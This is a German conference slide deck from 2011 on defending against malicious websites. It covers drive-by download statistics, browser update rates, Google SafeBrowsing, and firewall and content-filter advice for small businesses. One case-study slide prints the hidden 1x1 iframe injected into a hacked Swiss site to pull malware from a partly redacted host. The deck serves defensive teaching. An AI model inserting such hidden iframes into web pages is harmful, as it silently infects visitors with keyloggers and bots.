Business Communication
www.2wbc.ch - Unternehmensberatung für Informatik und Organisation
Kampf gegen bösartige Websites (10:50 Uhr, Track 1)
Wie schützt man sich vor infizierten Websites?
Dr. Thomas Dübendorfer, Google Switzerland GmbH
Thomas Weihrich, 2w Business Communications
Alex Bachmann, Studerus AG
1
Kampf gegen bösartige Websites
Dr. Thomas Dübendorfer Software Engineer und Tech Lead Google Switzerland GmbH
TEFO 2011, 24.11.2011, Zürich
Referent
Dr. Thomas Dübendorfer
• Präsident, Information Security Society Switzerland (www.ISSS.ch)
• Staff Software Engineer and Tech Lead, Google Switzerland GmbH
• Dozent, ETH Zürich
Ausbildung
Dr. sc., Dipl. Informatik-Ing., ETH Zürich
(ISC)2 Certified Information Systems Security Professional CISSP
Kontakt
Email: [email protected]
Web: http://thomas.duebendorfer.ch/
3
Drive-By Downloads
Quiz
Was haben diese Websites gemeinsam?
• Department of Homeland Security
• United Nations
• UK Civil Service
• Funjet Vacations
• Howaboutlunch.ch (Blind date service)
• Swiss TrendNet Support Knowledge Base
Sie wurden alle im April 2008 gehackt
... wie 510’000
andere Webseiten
(.ASP SQL injection)
Weiterführende Informationen: http://www.f-secure.com/weblog/archives/00001427.html
Anteil bösartiger URLs nach Inhaltskategorie
6
Referenz: Niels Provos et al., Google 2008, http://research.google.com/archive/provos-2008a.pdf
Fallstudie: Bösartige Website in der Schweiz
Diese Website wurde gehackt, um Malware-Downloads einzubinden.
Der Webmaster wurde informiert.
<iframe src=
"http://try-cxxxxxx/strong/023/"
width=1 height=1
style="visibility: hidden">
</iframe>
Installierte Malware:
• Keylogger
• Generische Downloader
• Bots
• Malware Überwachungs-
agenten
• Dialer
8
Wie sicher ist weit verbreitete Software?
Sicherheitsschwachstellen in Top Software
Produkt 2009 2010 Trend
Adobe Flash 23 56 +143%
Adobe PDF Reader 56 116 +107%
Microsoft
Internet Explorer
36 51 +42%
Microsoft
Windows Vista
59 90 +53%
Microsoft
Windows 7
5
(seit 22. Okt. 2009)
75 k.A.
Auswirkungen bei Ausnützen der Schwachstellen:
• Internet Explorer: Systemzugriff, Zugriff auf sensitive Daten etc.
• Windows 7: Systemzugriff, erhöhte Zugriffsrechte,
Dienstverweigerung (Denial of Service), Datenmanipulation etc.
Ca. 75 Sicherheitsupdates von 22 Herstellern pro Jahr und Heim-PC!
Abhilfe: Secunia PSI http://secunia.com/PSI scannt PC nach
verfügbaren Updates. Gratis für Heimbenutzer.
Apple Safari 5.0.5 Sicherheitsupdate
Sicherheitspatch für Schwachstelle in Webbrowser Apple Safari
verfügbar am 14.4.2011.
Schwachstelle betrifft:
• Apple Safari 5 (Windows)
• Apple Safari 5 (Mac OS X 10.5 und 10.6).
Auswirkung der Schwachstelle:
Der Besuch einer in böswilliger Absicht erstellten Website kann zu
einem unerwarteten Programmabbruch oder zur willkürlichen
Codeausführung führen.
Referenz:
Apple Support „Informationen über den Sicherheitsinhalt von Safari 5.0.5 “ vom 14.4.2011,
http://support.apple.com/kb/HT4596?viewlocale=de_DE
2011: Apple Safari 5.0.5 Update installiert?
45%
51%
4%
5.0.5
5.x (älterals 5.0.5)
4.x undälter
Anteile der Apple Safari Webbrowser-Versionen unter Windows 7 in
Benutzung (für Google Suchanfragen) drei Wochen nach Verfügbarkeit
des kritischen Security-Updates 5.0.5.
Quellen: [2011] Google, 2011, [2008] „Understanding the Web Browser Threat“, Frei S., Dübendorfer T., DEFCON 2008
45% veraltete
Webbrowser im
Einsatz global
(im Jahr 2008)
97%
85%
53%
33% 24%
Anteil der aktualisierten Webbrowser (innerhalb gleicher Hauptversion), welche
Google’s Webserver besuchten über 21 Tage nach verfügbarem Sicherheitsupdate.
Browser Update: Effektivitätsmessungen
Referenz: „Web Browser Security Update Effectiveness“, Dübendorfer T., Frei S., CRITIS 2009
13
Google SafeBrowsing Dank an Niels Provos und Noé Lutz von Google, Inc. für Ihren Input.
Schutz des Benutzers vor bösartigen Websites
Google SafeBrowsing schützt vor bösartigen Websites (Phishing,
Drive-By Download).
Warnhinweis bei Google Suchresultaten, die auf bösartige Websites
zeigen. Betroffener Webmaster wird informiert, der ISP (Autonomous
System) kann die SafeBrowsing-Liste für sein Netzwerk anfordern.
Warnung vor bösartigen Websites seit Firefox 3
Google Chrome, Apple Safari und Mozilla Firefox benutzen
das Google SafeBrowsing API zur Überprüfung auf bösartige URLs
zum Schutz des Websurfers.
Sicherheitshinweise für Webmaster und Surfer
Gratis Google Webmaster-Tools bieten dem Webmaster Sicherheitsdetails
bei entdeckter Malware oder unsicherer Software:
http://www.google.com/webmasters/
Oktober 2010:
Nach Ort der IP-Adressen von entdeckten Phishing-Websites.
Legende: ■ < ■ < ■ < ■ (log scale) Referenz: Okt. 2010, Google, SafeBrowsing
Top Countries Hosting Phishing Websites
November 2011:
Nach Ort der IP-Adressen von entdeckten Phishing-Websites.
Legende: ■ < ■ < ■ < ■ (log scale) Referenz: Nov. 2011, Google, SafeBrowsing
Top Countries Hosting Phishing Websites
242 (April 2011)
Referenz: 26.4.2010, Google, SafeBrowsing project
Phishing Hosting nach Top Level Domain
ch: 902 (Okt. 2011)
Referenz: 26.4.2010, Google, SafeBrowsing project
434 (April 2010)
Malware Hosting nach Top Level Domain
ch 188 (Okt. 2011)
Weitere gratis Sicherheitstechniken von Google
• Google Chrome: Web Browser, der Hackern von Pwn2Own 2010
am längsten standhielt Auto-Updates alle sechs Stunden Führt Adobe Flash Updates wesentlich schneller aus als
Standardupdateroutine
• SecBrowsing: schaltet unsichere Plug-ins in Chrome automatisch ab auch für Microsoft Internet Explorer und Mozilla Firefox:
http://secbrowsing.appspot.com/
• Google Public DNS Server: IPv4: 8.8.8.8, 8.8.4.4; gibt es auch für IPv6
Details: http://code.google.com/intl/de/speed/public-dns/docs/using.html
21
22
Danke für Ihre Aufmerksamkeit
Referent: Dr. Thomas Dübendorfer
23
Referenzen
• Google Webmaster Tools
https://www.google.com/webmasters/tools/
• XML feed for AS owners with malware and phishing URLs detected by
Google SafeBrowsing
http://googleonlinesecurity.blogspot.com/2010/10/phishing-urls-and-xml-
notifications.html
• Dübendorfer Thomas, Frei Stefan.
Why Silent Updates Boost Security, May 2009
http://www.techzoom.net/papers/browser_silent_updates_2009.pdf
• Niels Provos, Panayiotis Mavrommatis, Moheed Abu Rajab, and Fabian
Monrose. All Your iFRAMEs Point to Us. Google Technical Report. Feb 2008.
http://research.google.com/archive/provos-2008a.pdf
• Niels Provos, Dean McNamee, Panayiotis Mavrommatis, Ke Wang, and
Nagendra Modadugu. The Ghost in the Browser: Analysis of Web-based
Malware. In Proceedings of the first USENIX workshop on hot topics in
Botnets (HotBots '07), April 2007.
http://www.usenix.org/event/hotbots07/tech/full_papers/provos/provos.pdf
Business Communication
www.2wbc.ch - Unternehmensberatung für Informatik und Organisation
Front
Praxis im KMU Betrieb
Thomas Weihrich
Kampf gegen bösartige Websites
Business Communication
www.2wbc.ch - Unternehmensberatung für Informatik und Organisation
Die Firma 2wbc GmbH bietet Ihnen ein komplettes Leistungsangebot, das Ihre Informatik-Bedürfnisse vollständig abdeckt. Unser Schwerpunkt liegt dabei auf der praxisbezogenen Beratung und der kundenorientierten Projektleitung.
Gegründet 2003, 12 Mitarbeiter, eigentümergeführt
Kunden im Raum Ostschweiz, Schweiz, Österreich, Deutschland und Westafrika
Thomas Weihrich
Grundausbildung Maschinenbau,
Informatiktechniker TS, Nachdiplom NDS HTL/ITR
10 Jahre Software Engineering + 15 Jahre IT Systembau / Gesamtlösungen
Business Communication
www.2wbc.ch - Unternehmensberatung für Informatik und Organisation
INHALT
• Was wir beim KMU antreffen
• Empfehlungen zur IT Infrastruktur beim KMU
• Verbesserungen am Internetzugang
• Erfahrungen mit Content Filtern
• Zusammenfassung
Business Communication
www.2wbc.ch - Unternehmensberatung für Informatik und Organisation
Erste Eindrücke beim KMU
• Der Mitarbeiter im KMU Betrieb ist fokussiert auf seine Aufgaben und kümmert sich nicht um seine EDV Arbeitsmittel
• Warnmeldungen werden erst dann wahrgenommen, wenn diese penetrant und störend sind oder der PC bereits nicht mehr richtig funktioniert
• Der PC im KMU ist ‘lokal’ administriert
• Benutzer verfügen über umfangreiche Rechte (Administrator)
• Der Internetzugang läuft über ein vom Provider gratis zur Verfügung gestelltes Modem/Router
• Kollege war behilflich beim Einrichten…
Business Communication
www.2wbc.ch - Unternehmensberatung für Informatik und Organisation
Weitere Eindrücke beim KMU
• Gratis Virenschutz ist gemäss Presse gleich gut, darum werden auch gleich zwei davon installiert…
• Updates machen den PC langsam – besser deaktivieren…• Mit mehreren installierten Browsern hat man immer den
richtigen gleich zur Hand…• Viele Gratis-Tools erhöhen die Produktivität und die Individualität• Programme, Tools und AddOns funktionieren im Originalzustand• Keine Richtlinien/ Policy zum Gebrauch des Internets • Wenig Basiswissen zum Internet
Business Communication
www.2wbc.ch - Unternehmensberatung für Informatik und Organisation
Empfehlungen zur IT Infrastruktur beim KMU
• Regelmässige Updates für – Server OS, – Client OS – Programme und AddOns
• Update Verwaltung und Steuerung durch– WSUS (Gratis von Microsoft)– System Center Essentials o.A.
• Virenschutzlösung – mit zentraler Verwaltungskonsole– auf Server und Client installiert
Business Communication
www.2wbc.ch - Unternehmensberatung für Informatik und Organisation
Empfehlungen zur IT Infrastruktur beim KMU
• Minimalinstallation– Kundenimage ab 3 PC über Bereitstellungsdienst– Verzicht auf unwichtige AddOns
• Nur notwendige lokale Rechte– Keine Administratorenberechtigung – Benutzerkontensteuerung aktiviert– Feinsteuerung über zentrale GPO
• Regelmässige Systemüberprüfungen– Kontrolle mit Checkliste– Überwachung mit automatischer Benachrichtigung
Business Communication
www.2wbc.ch - Unternehmensberatung für Informatik und Organisation
Problemlösung beim Internetzugang
• Einsatz einer All-In-One Firewall Lösung mit– Intrusion Detection and Prevention (IDP)– Antivirusfilter (AV)– Contentfilter (CF)– AntiSpam (AS)
• Schulung der Anwender– Aufklärung und Sensibilisierung
• Firmenrichtlinien– Regelung der Internetverwendung– Erlassen von Verhaltensrichtlinien
Business Communication
www.2wbc.ch - Unternehmensberatung für Informatik und Organisation
Firewall Einstellungen
Business Communication
www.2wbc.ch - Unternehmensberatung für Informatik und Organisation
Antivirus (AV)
• Schutz der LAN Zone vor Viren aus dem Internet
Business Communication
www.2wbc.ch - Unternehmensberatung für Informatik und Organisation
Antivirus (AV)
• Scan der verfügbaren Protokolle
• Scan von Anhängen
Business Communication
www.2wbc.ch - Unternehmensberatung für Informatik und Organisation
Nutzen vom Content Filter (CF)
• Schutz der IT Infrastruktur vor Malware
• Schutz des Anwenders vor unerwünschten Inhalten
• Kinder- und Jugendschutz
• Reduktion der Ablenkung und
Fokussierung auf das Wesentliche
• Bandbreitenoptimierung
• Information über das Surfverhalten
Business Communication
www.2wbc.ch - Unternehmensberatung für Informatik und Organisation
Content Filter (CF)
Business Communication
www.2wbc.ch - Unternehmensberatung für Informatik und Organisation
Content Filter (CF)
Business Communication
www.2wbc.ch - Unternehmensberatung für Informatik und Organisation
Content Filter (CF)
Business Communication
www.2wbc.ch - Unternehmensberatung für Informatik und Organisation
Erfahrungswerte Blocked
Business Communication
www.2wbc.ch - Unternehmensberatung für Informatik und Organisation
Erfahrungswerte Passed
Business Communication
www.2wbc.ch - Unternehmensberatung für Informatik und Organisation
Erfahrungswerte kurz nach Einführung CF
Business Communication
www.2wbc.ch - Unternehmensberatung für Informatik und Organisation
Erfahrungswerte nach Schulung
Business Communication
www.2wbc.ch - Unternehmensberatung für Informatik und Organisation
Erfahrungswerte CF
Business Communication
www.2wbc.ch - Unternehmensberatung für Informatik und Organisation
Zusammenfassung
• Patch Management für alle eingesetzten Komponenten• Zentralisierte Verwaltung und Überwachung der Systeme• Reduktion auf die notwendigen Anwendungen• Reduktion auf die notwendigen Rechte• Regelmässige Checks• All-in-One-Firewall richtig konfiguriert• Business Content Only• Aufklärung und Schulung• Richtlinien
Business Communication
www.2wbc.ch - Unternehmensberatung für Informatik und Organisation
Schutz vor „Drive-by“ Infektion – Content-Filter
mit gültiger Content-Filter-Lizenz
Business Communication
www.2wbc.ch - Unternehmensberatung für Informatik und Organisation
Anteil bösartiger URLs nach Inhaltskategorie
28
Referenz: Niels Provos et al., Google 2008, http://research.google.com/archive/provos-2008a.pdf
Business Communication
www.2wbc.ch - Unternehmensberatung für Informatik und Organisation
Wahl der Content-Filter-Kategorien